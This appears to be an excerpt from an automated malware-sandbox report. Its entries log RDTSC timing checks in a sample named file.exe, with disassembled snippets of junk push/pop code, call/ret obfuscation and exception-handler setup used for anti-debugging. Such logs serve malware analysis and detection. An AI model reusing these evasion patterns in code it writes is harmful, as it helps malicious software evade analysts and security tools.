                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3BE second address: 62C3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3C2 second address: 62C3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3C6 second address: 62C3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63117C second address: 631182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631182 second address: 631187 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631187 second address: 6311D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB418E85322h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jc 00007FB418E8532Dh 0x00000018 jmp 00007FB418E85327h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB418E8531Ch 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6311D5 second address: 63120B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FB418C0B126h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB418C0B128h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov si, cx 0x0000002a push 6FA45BBDh 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop esi 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63137C second address: 631380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631380 second address: 63138A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63138A second address: 63138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631896 second address: 6318B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FB418C0B126h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318B0 second address: 6318C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6320A1 second address: 6320A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6323F5 second address: 6323FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63328F second address: 633294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634514 second address: 634518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B6F second address: 637B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B76 second address: 637BE1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB418E85318h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB418E85318h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov si, 1EC8h 0x0000002b mov dword ptr [ebp+1247C348h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FB418E85318h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d or dword ptr [ebp+122D2D82h], eax 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637BE1 second address: 637BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C87 second address: 639C95 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C95 second address: 639C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1E1 second address: 63A1E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1E7 second address: 63A1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1F9 second address: 63A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1FD second address: 63A249 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D275Ch], ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FB418C0B128h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e or edi, dword ptr [ebp+122D3ADEh] 0x00000034 push 00000000h 0x00000036 mov di, si 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007FB418C0B128h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A249 second address: 63A24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B192 second address: 63B198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A381 second address: 63A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A385 second address: 63A413 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FB418C0B128h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D1E5Bh], esi 0x0000002a push dword ptr fs:[00000000h] 0x00000031 and bl, 00000023h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jne 00007FB418C0B12Bh 0x00000041 mov eax, dword ptr [ebp+122D139Dh] 0x00000047 xor ebx, 50364F77h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007FB418C0B128h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov bx, BD83h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB418C0B12Ch 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A413 second address: 63A419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2ED second address: 63B306 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FB418C0B126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FB418C0B128h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D17B second address: 63D181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C4AB second address: 63C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FB418C0B126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D181 second address: 63D1E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB418E85323h 0x0000000e nop 0x0000000f jnp 00007FB418E85319h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FB418E85318h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edi, 1DF0CF1Dh 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+12456966h], edx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D1E0 second address: 63D1E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E100 second address: 63E105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D3E3 second address: 63D3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E105 second address: 63E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB418E85325h 0x0000000e jmp 00007FB418E8531Fh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FB418E85318h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e adc bl, 00000000h 0x00000031 mov ebx, 7B58A6F3h 0x00000036 push 00000000h 0x00000038 call 00007FB418E85327h 0x0000003d jo 00007FB418E85319h 0x00000043 movzx edi, di 0x00000046 pop edi 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FB418E85318h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push eax 0x00000064 pushad 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D3E7 second address: 63D3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FFC2 second address: 63FFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB418E85316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63FFCC second address: 63FFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63FFD0 second address: 63FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB418E8531Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63FFEB second address: 63FFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6401A4 second address: 6401AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6401AA second address: 640240 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418C0B128h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, 573E042Ah 0x00000013 push dword ptr fs:[00000000h] 0x0000001a sub edi, 0E01FEAAh 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov ebx, dword ptr [ebp+122D35BFh] 0x0000002d mov eax, dword ptr [ebp+122D13C5h] 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB418C0B128h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov di, dx 0x00000052 nop 0x00000053 ja 00007FB418C0B13Ch 0x00000059 push eax 0x0000005a pushad 0x0000005b jno 00007FB418C0B139h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6421A8 second address: 6421AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 640240 second address: 640246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 643215 second address: 643219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 643219 second address: 64321F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64321F second address: 643225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 645377 second address: 645388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB418C0B128h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64230A second address: 642310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6444DC second address: 6444E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 645388 second address: 64538E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6444E0 second address: 6444FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB418C0B135h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 642310 second address: 642395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FB418E85321h 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 movzx ebx, si 0x0000001a push dword ptr fs:[00000000h] 0x00000021 sbb di, 16B3h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FB418E85318h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D0F49h] 0x0000004d jns 00007FB418E85323h 0x00000053 adc bx, AFF0h 0x00000058 push FFFFFFFFh 0x0000005a or edi, 652BFF1Ah 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6444FD second address: 64457A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B130h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sbb edi, 4DDCCCBDh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+122D24B1h], ecx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 add dword ptr [ebp+12465E48h], edx 0x0000002b mov eax, dword ptr [ebp+122D0021h] 0x00000031 movsx edi, dx 0x00000034 push esi 0x00000035 mov ebx, ecx 0x00000037 pop edi 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007FB418C0B128h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 movzx ebx, cx 0x00000057 mov edi, dword ptr [ebp+12465DE0h] 0x0000005d mov di, dx 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jne 00007FB418C0B128h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 642395 second address: 642399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6455E2 second address: 6455E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64457A second address: 644590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E85322h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64651D second address: 646535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB418C0B126h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FB418C0B126h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 642399 second address: 64239D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 647269 second address: 64726F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644590 second address: 6445A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64239D second address: 6423B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418C0B132h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64726F second address: 647273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6445A2 second address: 6445A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6423B8 second address: 6423C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6445A6 second address: 6445AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6423C6 second address: 6423CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 647273 second address: 647307 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FB418C0B128h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub edi, dword ptr [ebp+1247C1C1h] 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D3896h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FB418C0B128h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1DFDh], edi 0x00000059 pushad 0x0000005a jnc 00007FB418C0B12Ch 0x00000060 mov dword ptr [ebp+122D251Dh], edx 0x00000066 popad 0x00000067 xchg eax, esi 0x00000068 js 00007FB418C0B12Eh 0x0000006e push ecx 0x0000006f jg 00007FB418C0B126h 0x00000075 pop ecx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FB418C0B12Fh 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 647307 second address: 647311 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6474B8 second address: 64753E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FB418C0B126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FB418C0B128h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 add dword ptr [ebp+122D2E6Fh], ecx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FB418C0B128h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D2439h] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov eax, dword ptr [ebp+122D1085h] 0x00000063 mov di, 55ADh 0x00000067 push FFFFFFFFh 0x00000069 jmp 00007FB418C0B12Ch 0x0000006e nop 0x0000006f push edi 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
